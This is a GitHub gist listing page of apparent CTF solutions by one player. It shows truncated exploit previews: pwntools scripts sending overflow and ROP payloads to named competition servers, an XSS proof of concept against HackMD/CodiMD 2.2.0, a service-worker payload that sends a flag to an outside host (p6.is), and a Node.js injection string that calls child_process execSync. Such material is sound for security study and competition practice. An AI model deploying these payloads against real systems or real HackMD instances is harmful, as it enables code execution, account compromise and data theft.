Skip to content

Instantly share code, notes, and snippets.

View po6ix's full-sized avatar

Posix po6ix

165 followers · 14 following
View GitHub Profile
@po6ix
po6ix / spinit.py
Created June 8, 2021 14:51
securitnet2021-final
from pwn import *
from ctypes import *
from time import sleep
context.log_level = 'debug'
rlibc = CDLL('./libc.so')
rlibc.srand(rlibc.time(0))
# p = process('./chall')
@po6ix
po6ix / keybase.md
Created June 8, 2021 09:15
Keybase

Keybase proof

I hereby claim:

  • I am posix-lee on github.
  • I am posix (https://keybase.io/posix) on keybase.
  • I have a public key whose fingerprint is 8A8E 554E 754D BD83 79F8 9A4A 6DE9 FFC9 30A8 4F20

To claim this, I am signing this object:

@po6ix
po6ix / BabyArmROP.py
Last active June 6, 2021 11:07
2021 Zh3ro CTF
from pwn import *
context.log_level = 'debug'
# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' '))
p = remote('pwn.zh3r0.cf', 1111)
e = ELF('./vuln')
p.send('a'*8)
p.recvuntil('a'*8)
@po6ix
po6ix / MoM5m4g1c.py
Last active June 5, 2021 23:57
WTFCTF 2021
from pwn import *
p = remote('20.42.99.115', 3000)
payload = b'\1'*150
p.sendline(payload)
p.interactive()
@po6ix
po6ix / COP.py
Last active June 2, 2021 15:33
2021 ICHASA CTF
from pwn import *
# p = process('./game')
p = remote('cop.ichsa.ctf.today', 8011)
for i in range(0x90):
p.sendlineafter('Please chose an option', '2')
p.sendlineafter('Please chose an option', '2')
payload = b'aaaaaa' + p64(0x401813)*16
@po6ix
po6ix / hackmd.txt
Last active December 20, 2020 16:29
Hackmd/Codemi 2.2.0 XSS Poc
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a>
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div>
* repeat below if you want to improve the reliability
```mermaid
graph LR;
A-->B;
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>"
```
@po6ix
po6ix / ex.html
Created December 13, 2020 16:20
Amazing notes
<iframe srcdoc="&#x3C;form action=&#x22;https://amazingnotes.asisctf.com:444/&#x22; method=&#x22;POST&#x22; id=x&#x3E;
&#x3C;input name=ext value=es&#x3E;
&#x3C;textarea name=note&#x3E;
self.addEventListener(&#x22;fetch&#x22;, function(event) {
if(event.request.url.indexOf(&#x22;flag&#x22;) != -1)
return;
event.respondWith(new Response(&#x60;
&#x3C;img src=//p6.is/givemeflag&#x3E;
<script>
@po6ix
po6ix / csregex.md
Created November 1, 2020 19:30
CyberSecurityRumble-Solutions 
'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+' 
CSR{r363x_15_fun_r363x_15_l0v3}
@po6ix
po6ix / beginners-capsule.js
Last active October 11, 2020 07:23
function WeakMap(...e) {
return {
set: (...e)=>{
console.log(e)
},
has: () => {
console.log(87)
return 1;
}
}
@po6ix
po6ix / graphviz++
Last active September 6, 2020 13:23
2020 InterKosenCTF Writeups
digraph g1 {
subgraph cluster_0 {
style=filled;
color=lightgrey;
node [style=filled, color=white];
a0 -> a1 -> a2 -> a3;
}
start -> a0;
a3 -> end;
a1 -> b3;